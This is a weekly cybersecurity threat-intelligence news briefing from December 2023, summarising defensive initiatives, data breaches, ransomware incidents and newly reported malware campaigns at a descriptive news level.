We use cookies to improve your experience. Do you accept?

Cyware Weekly Threat Intelligence - December 11–15

Cyware Weekly Threat Intelligence - December 11–15 - Featured Image

Weekly Threat Briefing Dec 15, 2023

The Good

As the cyber threats landscape continues to grow grim, proactive measures are being taken to mitigate potential impacts. Amidst the surge in software supply chain attacks, U.S. government agencies have issued a guideline for the safe use of SBOMs and open-source repositories. Separately, MITRE launched a new threat model framework, named EMB3D, to address threats against OT and ICS.

  • MITRE unveiled a novel threat model framework named EMB3D to help government agencies and private organizations safeguard their Operation Technology (OT) and Industrial Control Systems (ICS). It offers a knowledge base on cyber threats to embedded devices, enabling users to map these threats with vulnerabilities using frameworks like CWE, CVE, and MITRE ATT&CK. The framework suggests mitigations, emphasizing technical mechanisms for device vendors to implement against specific threats. It is set for public release in early 2024.

  • U.S. lawmakers allocated $874.2 billion for the 2024 National Defense Authorization Act, a portion of which will be used to refine the defensive and offensive cyber skill sets. These include creating a cross-functional team to defend threats against Nuclear Command, Control, and Communications (NC3), developing robust cyber support mechanisms, and creating a bureau chief data officer program to improve data fluency.

  • The NSA, the ODNI, the CISA, and industry partners released a joint advisory to bolster the security against software supply chain attacks. The guidance primarily covers how to manage and maintain SBOMs, open-source software.. Additionally, it provides details on things to consider when adopting open-source software and distribution of approved software components using an SBOM.

  • Microsoft's Digital Crimes Unit seized multiple domains operated by the Vietnam-based Storm-1152 cybercrime group, which sold over 750 million fake Microsoft accounts and tools, generating millions in illegal profits through fake websites and social media. These fake accounts were further used as a channel to conduct mass phishing attacks, identity theft, and DDoS attacks.

The Bad

Database security is back in the limelight as DonorView and Dubai Taxi Company were found leaking a trove of sensitive data from their databases. Meanwhile, several top institutions and firms, such as Kyivstar, Toyota Financial Services, and Americold, fell victim to cyberattacks.

  • Tri-City Medical Center, California, despite resuming operations 17 days ago after a ransomware attack, was observed facing ongoing extortion attempts by the INC RANSOM group. The group claimed to possess stolen records from the hospital by posting proof on the dark web. The documents included prior authorization forms, financial records, and patient information. While the extent of the data breach remains unclear, there is no confirmation of access to the hospital's EMR system.

  • A misconfigured database owned by the fundraising platform DonorView exposed nearly one million records that contained addresses, names, phone numbers, emails, and payment methods of donors. The records also contained sensitive details, such as medical information, images, and names of attending doctors, of children.

  • The Dubai Taxi Company left a MongoDB database open to the public, exposing a trove of sensitive information about 197K users and 23K drivers. The exposed details included banking details and email addresses, phone models, login credentials, driver’s license numbers, work permit numbers, and nationality of users and drivers.

  • Ukrainian telecom operator Kyivstar was the target of a cyberattack that knocked its internet access and mobile communications offline. Market analysis firm Telegeography calculated that roughly half of Ukraine's mobile subscriber base was compromised during the incident. However, the operators confirmed that the personal data of subscribers were not compromised.

  • Researchers uncovered hundreds of fake profiles on LinkedIn, targeting professionals at companies in Saudi Arabia. As part of the campaign, attackers leveraged well-connected synthetic identities to create fraudulent profiles and later sent contact requests to victims to steal their contact lists and other information.

  • A ransomware attack on cold storage giant Americold affected nearly 130,000 people, including the information of current and former employees. Investigation revealed that details like names, addresses, Social Security numbers, passport numbers, financial information, and medical information were compromised in the incident.

  • Sony initiated an investigation into an alleged ransomware attack on its subsidiary Insomniac Games after the Rhysida threat actor threatened to sell the stolen data if a ransom of $2 million was not paid within seven days. Meanwhile, the officials believe that no other Sony Interactive Entertainment (SIE) or Sony divisions were impacted by the incident.

  • Toyota Financial Services disclosed a data breach that exposed the personal and financial data of customers. The incident occurred after threat actors gained unauthorized access to Kreditbank’s systems and stole the full names, residence addresses, contact information, and lease-purchase details of customers.

  • Kentucky-based Norton Healthcare confirmed that attackers stole around 2.5 million users’ data in the May ransomware attack. The data included driver’s licenses, government ID numbers, financial information, and digital signatures of people. Health information, insurance information, and medical ID numbers belonging to former patients, employees, and employee dependents and beneficiaries were also impacted by the incident.

  • A new wave of BazarCall attacks used Google Forms to install malware on victims’ systems. The forms were sent via phishing emails and included details of fake transactions, such as the invoice number, date, and payment method, to create a sense of urgency among recipients. To cancel the subscription or raise a dispute, recipients were urged to call a toll-free number, which was a threat actor’s phone number. At the final stage, the victim was tricked into installing BazarLoader malware onto their systems.

  • In an update, the Idaho National Laboratory revealed that the sensitive information of 45,047 current and former employees and their spouses and dependents was affected in the cyberattack that occurred on November 20. The exposed information includes names, SSNs, salary information, and banking details of individuals.

  • Healthcare device manufacturer LivaNova PLC fell victim to the LockBit ransomware group. The attack, detected on December 9 allegedly exposed a substantial 2.2TB of sensitive data, including product specifications, employee information, financial documents, and more. The threat actor has uploaded the stolen data on its leak site and set a deadline for its potential public release.

  • Food and beverage company, Kraft Heinz, started an investigation into a cyber incident after the Snatch ransomware group added the organization’s name to its victims’ list. However, the company did not verify the attackers’ claim and stated that criminals appeared to have targeted a decommissioned marketing site hosted on an external platform.

  • Ledger revealed that attackers pushed a malicious version of its Ledger dApp Connect Kit library to steal $600,000 in crypto and NFTs.The malicious code used a rogue WalletConnect project to reroute funds to a hacker wallet. It’s not immediately clear how many people fell victim to the hack.

New Threats

This week, Lazarus and Fancy Bear expanded their malware arsenal to target more organizations. While Lazarus introduced three DLang-based malware, Fancy Bear was linked to the use of the custom HeadLace backdoor. Besides, SOHO routers came under attack by the operators of KV-Botnet and NKAbuse registered itself as the first-ever malware to abuse the NKN blockchain.

  • ESET Research discovered 116 malicious packages on the PyPI repository. These packages infected both Windows and Linux systems and were used to deliver either a W4SP stealer variant or a clipboard monitor designed to steal cryptocurrency. In some cases, a backdoor was delivered in the final stage to execute arbitrary commands, exfiltrate data, and take screenshots. These packages were downloaded over 10,000 times.
  • The North Korea-linked threat group Lazarus was attributed to a new global campaign that exploits the infamous Log4j flaw to deploy three previously undocumented DLang-based malware - NineRAT, DLRAT, and BottomLoader. The campaign, dubbed Operation Blacksmith, is believed to have been active since March and targeted organizations in the manufacturing, agriculture, and physical security sectors.
  • An attack campaign, associated with the Fancy Bear, was observed using lures related to the ongoing Israel-Hamas war to deliver a custom backdoor called HeadLace. The campaign targeted critical infrastructure organizations across Hungary, Turkey, Australia, Poland, Belgium, Ukraine, Germany, Azerbaijan, Saudi Arabia, Kazakhstan, Italy, Latvia, and Romania. The infection chain exploited a WinRAR flaw called CVE-2023-38831 to propagate the backdoor.
  • A series of SQL injection attacks targeting companies in the Asia-Pacific was attributed to a previously unknown threat actor called GambleForce. The attack relied on open-source tools like dirsearch, sqlmap, tinyproxy, and redis-rogue-getshell, with the ultimate goal of exfiltrating sensitive information from compromised networks.
  • Researchers linked a sophisticated botnet, tracked as KV-Botnet, to the China-linked Volt Typhoon threat actor. The botnet is designed to target SOHO devices and VPN devices, some of which have reached End of Life. The botnet has been active since at least 2022 and, based on its target scope, it is believed that attackers are using it for espionage and information gathering.
  • A new Go-based malware named NKAbuse becomes the first strain to abuse New Kind of Network (NKN) technology for stealthy communications. The multi-platform malware was observed targeting Linux desktops in Mexico, Colombia, and Vietnam. During an attack, aimed at a financial company, the malware was propagated by exploiting an old flaw (CVE-2017-5638) in Apache Struts. The malware acts as a remote access trojan and also includes DDoS capabilities.
  • ESET researchers discovered a new campaign by the Oilrig group that used three new malware downloaders, ODAgent, OilCheck, and OilBooster, to infect victims and organizations in Israel. The attackers also released an updated version of SampleCheck5000 downloader that was used as part of attacks against Israel. The targeted organizations belonged to healthcare, manufacturing, and government sectors.
  • The Gaza Cyber Gang deployed an updated version of the Pierogi backdoor to target Palestinian entities. , The malware, tracked as Pierogi++, is written in C++ and is equipped with capabilities to take screenshots, execute commands, and download malicious files. It is distributed via decoy document written in Arabic and English.
  • Proofpoint warned recruiters about a campaign that targeted them with emails designed to deploy the More_Eggs backdoor. The campaign was launched by financially motivated TA4557 threat actors throughout 2022 and 2023 and relied on third-party job boards to target recruiters. Alternatively, the actor was observed replying with a PDF or Word attachment containing instructions to redirect victims to fake resume websites.
  • A month after the patches were made available by Netgate, around 1,459 pfSense instances were found vulnerable to command injection and cross-site scripting flaws, allowing attackers to perform remote code execution on the appliance. The flaws were tracked as CVE-2023-42325 (XSS), CVE-2023-42327 (XSS), and CVE-2023-42326 (command injection).

Related Threat Briefings